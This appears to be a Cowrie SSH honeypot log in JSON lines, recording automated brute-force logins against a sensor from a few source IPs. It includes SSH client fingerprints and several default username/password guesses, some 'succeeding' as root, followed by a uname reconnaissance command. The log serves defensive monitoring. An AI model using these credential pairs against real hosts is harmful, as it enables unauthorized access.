{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:39:05.508455Z","src_ip":"194.233.79.134","session":"432bccbb87ea"}
{"eventid":"cowrie.login.failed","username":"deploy","password":"deploy123","message":"login attempt [deploy/deploy123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:39:07.144531Z","src_ip":"194.233.79.134","session":"432bccbb87ea"}
{"eventid":"cowrie.session.closed","duration":"5.5","message":"Connection lost after 5.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:39:08.808717Z","src_ip":"194.233.79.134","session":"432bccbb87ea"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38172,"dst_ip":"1.2.3.4","dst_port":22,"session":"c732adb5a90a","protocol":"ssh","message":"New connection: 212.227.125.160:38172 (1.2.3.4:22) [session: c732adb5a90a]","sensor":"my-vps","timestamp":"2025-08-28T03:39:10.303272Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:39:10.303932Z","src_ip":"212.227.125.160","session":"c732adb5a90a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:39:10.518309Z","src_ip":"212.227.125.160","session":"c732adb5a90a"}
{"eventid":"cowrie.login.failed","username":"awsgui","password":"awsgui","message":"login attempt [awsgui/awsgui] failed","sensor":"my-vps","timestamp":"2025-08-28T03:39:11.164261Z","src_ip":"212.227.125.160","session":"c732adb5a90a"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:39:12.381224Z","src_ip":"212.227.125.160","session":"c732adb5a90a"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":32027,"dst_ip":"1.2.3.4","dst_port":22,"session":"361feee6bbef","protocol":"ssh","message":"New connection: 45.125.211.194:32027 (1.2.3.4:22) [session: 361feee6bbef]","sensor":"my-vps","timestamp":"2025-08-28T03:39:15.817992Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:39:15.840467Z","src_ip":"45.125.211.194","session":"361feee6bbef"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:39:16.032606Z","src_ip":"45.125.211.194","session":"361feee6bbef"}
{"eventid":"cowrie.login.success","username":"root","password":"Password","message":"login attempt [root/Password] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:39:16.867523Z","src_ip":"45.125.211.194","session":"361feee6bbef"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:39:17.357015Z","src_ip":"45.125.211.194","session":"361feee6bbef"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:39:17.357883Z","src_ip":"45.125.211.194","session":"361feee6bbef"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:39:17.575206Z","src_ip":"45.125.211.194","session":"361feee6bbef"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:39:17.578248Z","src_ip":"45.125.211.194","session":"361feee6bbef"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59496,"dst_ip":"1.2.3.4","dst_port":22,"session":"96531b5e1ab2","protocol":"ssh","message":"New connection: 212.227.235.229:59496 (1.2.3.4:22) [session: 96531b5e1ab2]","sensor":"my-vps","timestamp":"2025-08-28T03:39:18.967231Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:39:18.968269Z","src_ip":"212.227.235.229","session":"96531b5e1ab2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:39:19.215126Z","src_ip":"212.227.235.229","session":"96531b5e1ab2"}
{"eventid":"cowrie.session.closed","duration":120.00148248672485,"message":"Connection lost after 120 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:39:19.293703Z","src_ip":"212.227.235.229","session":"8274a758c1e2"}
{"eventid":"cowrie.login.failed","username":"dolphinscheduler","password":"dolphinscheduler","message":"login attempt [dolphinscheduler/dolphinscheduler] failed","sensor":"my-vps","timestamp":"2025-08-28T03:39:19.958574Z","src_ip":"212.227.235.229","session":"96531b5e1ab2"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:39:21.208732Z","src_ip":"212.227.235.229","session":"96531b5e1ab2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59050,"dst_ip":"1.2.3.4","dst_port":22,"session":"4183fb1a671c","protocol":"ssh","message":"New connection: 212.227.125.160:59050 (1.2.3.4:22) [session: 4183fb1a671c]","sensor":"my-vps","timestamp":"2025-08-28T03:39:21.846361Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:39:21.847405Z","src_ip":"212.227.125.160","session":"4183fb1a671c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:39:22.067122Z","src_ip":"212.227.125.160","session":"4183fb1a671c"}
{"eventid":"cowrie.login.success","username":"root","password":"passwd","message":"login attempt [root/passwd] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:39:22.724292Z","src_ip":"212.227.125.160","session":"4183fb1a671c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:39:23.175543Z","src_ip":"212.227.125.160","session":"4183fb1a671c"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:39:23.176322Z","src_ip":"212.227.125.160","session":"4183fb1a671c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:39:23.394151Z","src_ip":"212.227.125.160","session":"4183fb1a671c"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:39:23.395244Z","src_ip":"212.227.125.160","session":"4183fb1a671c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41704,"dst_ip":"1.2.3.4","dst_port":22,"session":"d238d43dd7dc","protocol":"ssh","message":"New connection: 212.227.235.229:41704 (1.2.3.4:22) [session: d238d43dd7dc]","sensor":"my-vps","timestamp":"2025-08-28T03:39:24.669427Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:39:24.670093Z","src_ip":"212.227.235.229","session":"d238d43dd7dc"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:39:24.920399Z","src_ip":"212.227.235.229","session":"d238d43dd7dc"}
{"eventid":"cowrie.login.success","username":"root","password":"passwd","message":"login attempt [root/passwd] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:39:25.994863Z","src_ip":"212.227.235.229","session":"d238d43dd7dc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:39:26.592131Z","src_ip":"212.227.235.229","session":"d238d43dd7dc"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:39:26.592889Z","src_ip":"212.227.235.229","session":"d238d43dd7dc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:39:26.843929Z","src_ip":"212.227.235.229","session":"d238d43dd7dc"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:39:26.845143Z","src_ip":"212.227.235.229","session":"d238d43dd7dc"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":45184,"dst_ip":"1.2.3.4","dst_port":22,"session":"e0d5c5b31172","protocol":"ssh","message":"New connection: 45.125.211.194:45184 (1.2.3.4:22) [session: e0d5c5b31172]","sensor":"my-vps","timestamp":"2025-08-28T03:39:30.587307Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:39:30.608712Z","src_ip":"45.125.211.194","session":"e0d5c5b31172"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:39:30.795327Z","src_ip":"45.125.211.194","session":"e0d5c5b31172"}
{"eventid":"cowrie.login.failed","username":"www","password":"123456","message":"login attempt [www/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T03:39:31.626081Z","src_ip":"45.125.211.194","session":"e0d5c5b31172"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:39:32.835656Z","src_ip":"45.125.211.194","session":"e0d5c5b31172"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33904,"dst_ip":"1.2.3.4","dst_port":22,"session":"4f3fdd815c26","protocol":"ssh","message":"New connection: 212.227.125.160:33904 (1.2.3.4:22) [session: 4f3fdd815c26]","sensor":"my-vps","timestamp":"2025-08-28T03:39:39.451227Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:39:39.480620Z","src_ip":"212.227.125.160","session":"4f3fdd815c26"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:39:39.681454Z","src_ip":"212.227.125.160","session":"4f3fdd815c26"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"oracle123","message":"login attempt [oracle/oracle123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:39:40.644254Z","src_ip":"212.227.125.160","session":"4f3fdd815c26"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:39:41.875456Z","src_ip":"212.227.125.160","session":"4f3fdd815c26"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":18744,"dst_ip":"1.2.3.4","dst_port":22,"session":"31b247c27f56","protocol":"ssh","message":"New connection: 45.125.211.194:18744 (1.2.3.4:22) [session: 31b247c27f56]","sensor":"my-vps","timestamp":"2025-08-28T03:39:45.456778Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:39:45.463257Z","src_ip":"45.125.211.194","session":"31b247c27f56"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:39:45.675129Z","src_ip":"45.125.211.194","session":"31b247c27f56"}
{"eventid":"cowrie.login.failed","username":"sonar","password":"sonar","message":"login attempt [sonar/sonar] failed","sensor":"my-vps","timestamp":"2025-08-28T03:39:46.495652Z","src_ip":"45.125.211.194","session":"31b247c27f56"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:39:47.706621Z","src_ip":"45.125.211.194","session":"31b247c27f56"}
